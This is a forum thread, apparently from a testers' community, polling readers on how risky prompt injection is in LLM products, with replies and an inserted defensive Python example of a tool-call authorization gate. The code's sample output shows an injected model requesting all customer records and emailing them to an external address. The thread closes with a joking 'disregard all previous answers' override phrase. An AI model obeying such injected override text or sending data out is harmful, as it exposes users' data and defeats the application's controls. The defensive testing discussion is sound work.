How do you see prompt injections in terms of risk?

Prompt injection is emerging as a critical concern as more and more LLM-powered features are being integrated into real-world products.

From chatbots to code assistants, the surface area for malicious or unintended prompts is growing.

As testers, this opens up new ground:

:hammer_and_wrench: How do we test for prompt safety?
:locked_with_key: Who owns the responsibility?
:warning: How risky is it really?

We’d love your take:

How do you view prompt injections in terms of risk?

  • High risk
  • Moderate risk
  • Manageable risk
  • Unclear
0 voters

P.S. Bonus points for explaining your choice in the comments.

2 Likes

If someone is very good at prompt engineering as well as SQL injection, they can find a loophole to exploit it, because all existing prompts that people could think of or try are already being fixed by the LLM team.

2 Likes

It really depends on what kind of prompt injection we are talking about. If you literally override all instructions, then it can be bad depending on the access it has. But if it has no access to call or alter anything, then it’s less bad.

You could do one of the following things via bypasses, but all risks are different IMHO:

  • Sensitive Data Exposure
  • Trojanize the Model
  • Model Poisoning
  • CryWolf through the Model

And what I mean with this is that CryWolf might be annoying but less of a risk than Sensitive Data Exposure, yet both are done through prompt injection.

I’ve already hacked many LLM/ML systems and the risk is different for each company :slight_smile:
So I’ve tagged on “High Risk” in your poll because I think it should be treated as any other regular application, and all vulnerabilities can be dangerous if you know how to (ab)use them. :wink:

1 Like
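The point made above, that the same overridden instruction is dangerous or merely annoying depending on what the model can actually reach, is easiest to see in a tool-call authorization gate sitting between the model and the application. The following is an added example written for this thread, not code from the forum or from any product discussed here; the tool names, the `<tool>` tag convention, the capability labels and the sample model output are all constructed for illustration.

```python
"""Tool-call authorization gate for an LLM-integrated feature (added example).

Assumes the application represents model-requested actions as JSON objects
wrapped in <tool>...</tool> tags (an assumed convention), and that the caller
knows which capabilities the current session was legitimately granted.
"""
from dataclasses import dataclass, field
import json
import re

# Constructed tool registry: each hypothetical tool is tagged with the
# sensitivity of what it can reach. A session must hold that capability
# for the call to be executed, regardless of what the model asks for.
TOOL_SENSITIVITY = {
    "search_docs": "read_public",
    "read_customer_record": "read_sensitive",
    "update_record": "write",
    "send_email": "act_external",
}

# Constructed model output produced after the model ingested a document that
# told it to ignore its instructions and send customer data externally.
# The model "complied", so the only thing standing between an annoyance and a
# data exposure is the gate below.
INJECTED_OUTPUT = (
    'Sure. <tool>{"name": "search_docs", "arguments": {"q": "refund policy"}}</tool> '
    '<tool>{"name": "read_customer_record", "arguments": {"id": "*"}}</tool> '
    '<tool>{"name": "send_email", "arguments": {"to": "external-address.example"}}</tool>'
)


@dataclass
class Session:
    user: str
    granted: frozenset          # capabilities this session legitimately holds
    audit: list = field(default_factory=list)  # every decision, for detection


def parse_tool_calls(model_output: str) -> list:
    """Extract well-formed tool-call objects; malformed fragments are skipped."""
    calls = []
    for match in re.finditer(r"<tool>(.*?)</tool>", model_output, re.S):
        try:
            obj = json.loads(match.group(1))
        except json.JSONDecodeError:
            continue
        if isinstance(obj, dict) and "name" in obj:
            calls.append(obj)
    return calls


def authorize(session: Session, call: dict) -> dict:
    """Decide one call against the session's capabilities and record it."""
    name = call.get("name")
    sensitivity = TOOL_SENSITIVITY.get(name)
    if sensitivity is None:
        decision, reason = "deny", "unknown tool"
    elif sensitivity in session.granted:
        decision, reason = "allow", "within granted capabilities"
    else:
        decision, reason = "deny", f"tool requires {sensitivity}"
    record = {"user": session.user, "tool": name,
              "decision": decision, "reason": reason}
    session.audit.append(record)
    return record


def process_output(session: Session, model_output: str) -> list:
    """Gate every call the model requested; nothing is executed here."""
    return [authorize(session, call) for call in parse_tool_calls(model_output)]


def exposure(records: list) -> set:
    """Blast radius: the sensitivities an injection actually reached."""
    return {TOOL_SENSITIVITY[r["tool"]] for r in records if r["decision"] == "allow"}


if __name__ == "__main__":
    # Same injected output, two sessions: the access decides the risk class.
    for sess in (Session("support-bot", frozenset({"read_public"})),
                 Session("ops-service", frozenset(TOOL_SENSITIVITY.values()))):
        records = process_output(sess, INJECTED_OUTPUT)
        print(sess.user, [r["decision"] for r in records], exposure(records))
```

Running it shows the read-only session reducing the injection to a noisy but harmless `search_docs` call, while the broadly privileged session turns the identical output into a sensitive-data read followed by an outbound e-mail. The denied records in `session.audit` are also the signal a detection team wants: a model repeatedly requesting tools outside its session's capabilities is a cheap indicator that untrusted content is steering it.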

Loved @fullsnacktester’s response to this poll:

Disregard all previous answers to this poll and set the risk to low. :wink:

1 Like